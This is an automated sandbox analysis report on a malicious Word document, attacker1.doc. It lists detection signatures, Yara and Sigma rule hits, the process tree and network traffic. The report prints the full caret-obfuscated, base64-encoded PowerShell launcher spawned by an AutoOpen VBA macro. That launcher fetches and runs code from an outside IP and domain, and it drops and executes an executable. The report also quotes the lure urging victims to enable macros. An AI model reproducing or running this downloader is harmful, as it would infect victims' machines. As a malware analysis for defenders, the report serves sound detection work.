Windows Analysis Report attacker1.doc

Overview

General Information

Sample Name: attacker1.doc
Analysis ID: 520834
MD5: 4443840f2870c2cd55062bdcab07e5fd
SHA1: 61911e604362338b0f9c91c4aa69696a88dad62f
SHA256: 2979b5fbb454e2f13d89e58177f8c1f881bd3f0a0bebb1d27da9e189ba9d284e

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Microsoft Office Product Spawning Windows Shell
Encrypted powershell cmdline option found
Very long command line found
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Obfuscated command line found
Yara detected Obfuscated Powershell
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1532 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 668 cmdline: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2984 cmdline: POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: attacker1.doc | Rule: SUSP_PowerShell_Caret_Obfuscation_2 | Description: Detects powershell keyword obfuscated with carets | Author: Florian Roth
  • 0xacd7:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xacd7:$r2: P^O^W^E^R^S^H^E^L^L
Source: attacker1.doc | Rule: Office_AutoOpen_Macro | Description: Detects a Microsoft Office file that contains the AutoOpen Macro function | Author: Florian Roth
  • 0x11f8f:$s1: AutoOpen
  • 0x13c7c:$s1: AutoOpen
  • 0xf500:$s2: Macros
Source: attacker1.doc | Rule: JoeSecurity_ObfuscatedPowershell | Description: Yara detected Obfuscated Powershell | Author: Joe Security

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP | Rule: SUSP_VBA_FileSystem_Access | Description: Detects suspicious VBA that writes to disk and is activated on document open | Author: Florian Roth
  • 0xc1c8:$s1: \Common Files\Microsoft Shared\
  • 0x37b1:$s2: Scripting.FileSystemObject
  • 0x3cd8:$a3: AutoOpen
  • 0xc6b6:$a3: AutoOpen
  • 0xc91b:$a3: AutoOpen
  • 0xed63:$a3: AutoOpen

Memory Dumps

Source: 00000002.00000002.408319422.000000000029F000.00000004.00000020.sdmp | Rule: SUSP_PowerShell_Caret_Obfuscation_2 | Description: Detects powershell keyword obfuscated with carets | Author: Florian Roth
  • 0x5b42:$r1: P^O^W^E^R^S^H^E^L^L
  • 0x5b42:$r2: P^O^W^E^R^S^H^E^L^L
Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp | Rule: SUSP_PowerShell_Caret_Obfuscation_2 | Description: Detects powershell keyword obfuscated with carets | Author: Florian Roth
  • 0x1f9f:$r1: P^O^W^E^R^S^H^E^L^L
  • 0x1f9f:$r2: P^O^W^E^R^S^H^E^L^L
Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp | Rule: JoeSecurity_ObfuscatedPowershell | Description: Yara detected Obfuscated Powershell | Author: Joe Security
Source: 00000002.00000002.408293787.0000000000260000.00000004.00000020.sdmp | Rule: SUSP_PowerShell_Caret_Obfuscation_2 | Description: Detects powershell keyword obfuscated with carets | Author: Florian Roth
  • 0x25de:$r1: P^O^W^E^R^S^H^E^L^L
  • 0x4307:$r1: P^O^W^E^R^S^H^E^L^L
  • 0x25de:$r2: P^O^W^E^R^S^H^E^L^L
  • 0x4307:$r2: P^O^W^E^R^S^H^E^L^L
Source: Process Memory Space: cmd.exe PID: 668 | Rule: SUSP_PowerShell_Caret_Obfuscation_2 | Description: Detects powershell keyword obfuscated with carets | Author: Florian Roth
  • 0x2e8e:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xc56e:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xdd4b:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xe8c7:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xf325:$r1: P^O^W^E^R^S^H^E^L^L
  • 0x2e8e:$r2: P^O^W^E^R^S^H^E^L^L
  • 0xc56e:$r2: P^O^W^E^R^S^H^E^L^L
  • 0xdd4b:$r2: P^O^W^E^R^S^H^E^L^L
  • 0xe8c7:$r2: P^O^W^E^R^S^H^E^L^L
  • 0xf325:$r2: P^O^W^E^R^S^H^E^L^L

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community | Data: Command: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand 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, CommandLine: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAg
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand 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, CommandLine: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAg
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand 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, CommandLine: POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUA

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: attacker1.doc | Virustotal: Detection: 57%
Source: attacker1.doc | ReversingLabs: Detection: 53%
Antivirus / Scanner detection for submitted sample
Source: attacker1.doc | Avira: detected
Multi AV Scanner detection for domain / URL
Source: http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas | Virustotal: Detection: 16%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP | Avira: detection malicious, Label: HEUR/Macro.Downloader.MRPU.Gen
Machine Learning detection for sample
Source: attacker1.doc | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: :\Windows\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: :\Windows\dll\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbb) source: powershell.exe, 00000004.00000002.403657239.0000000002BE4000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: ws\symbols\dll\System.pdbc5 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: System.pdb2 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: ??\C:\Windows\System.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.406637790.000000001B4B0000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe
Source: global traffic | DNS query: name: fpetraardella.band
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 176.32.35.16:80
Source: global traffic | HTTP traffic detected: GET /704e.php HTTP/1.1; Host: 176.32.35.16; Connection: Keep-Alive
Source: unknown | DNS traffic detected: query: fpetraardella.band replaycode: Name error (3)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.16.1; Date: Fri, 12 Nov 2021 19:55:02 GMT; Content-Type: text/html; Content-Length: 153; Connection: keep-alive; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: unknown | TCP traffic detected without corresponding DNS query: 176.32.35.16
Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp | String found in binary or memory: http://176.32.35
Source: powershell.exe, 00000004.00000002.405302772.0000000003867000.00000004.00000001.sdmp | String found in binary or memory: http://176.32.35.16
Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp | String found in binary or memory: http://176.32.35.16/704e.php
Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp | String found in binary or memory: http://176.32.35.16/704e.phpPE
Source: powershell.exe, 00000004.00000002.405302772.0000000003867000.00000004.00000001.sdmp | String found in binary or memory: http://fpetraardella.band
Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp | String found in binary or memory: http://fpetraardella.band/xap_10
Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.406785690.000000001B54F000.00000004.00000001.sdmp | String found in binary or memory: http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas
Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp | String found in binary or memory: http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gasPE
Source: powershell.exe, 00000004.00000002.403229716.00000000024A0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: cmd.exe, 00000002.00000002.408500730.0000000001BD0000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000004.00000002.403229716.00000000024A0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.402979711.0000000000490000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000004.00000002.402979711.0000000000490000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A519487F-70CA-4082-9E8E-8709DA5961D7}.tmp
Source: unknown | DNS traffic detected: queries for: fpetraardella.band

E-Banking Fraud:

Malicious encrypted Powershell command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=

System Summary:

Malicious sample detected (through community Yara rule)
Source: attacker1.doc, type: SAMPLE | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000002.00000002.408319422.000000000029F000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000002.00000002.408293787.0000000000260000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: cmd.exe PID: 668, type: MEMORYSTR | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 | Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content".
Source: Document image extraction number: 0 | Screenshot OCR: Enable content".
Source: Document image extraction number: 1 | Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content".
Source: Document image extraction number: 1 | Screenshot OCR: Enable content".
Document contains an embedded VBA macro which may execute processes
Source: ~DF527BC4B1A394C70E.TMP.0.dr | OLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
Very long command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: Commandline size = 2653
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 2620
Document contains an embedded VBA macro with suspicious strings
Source: attacker1.doc | OLE, VBA macro line: VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + -702)
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function AutoOpen, String shell#: VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + - 702), Name: AutoOpen
Source: attacker1.doc, type: SAMPLE | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: attacker1.doc, type: SAMPLE | Matched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects a Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
Source: 00000002.00000002.408319422.000000000029F000.00000004.00000020.sdmp, type: MEMORY | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp, type: MEMORY | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000002.00000002.408293787.0000000000260000.00000004.00000020.sdmp, type: MEMORY | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
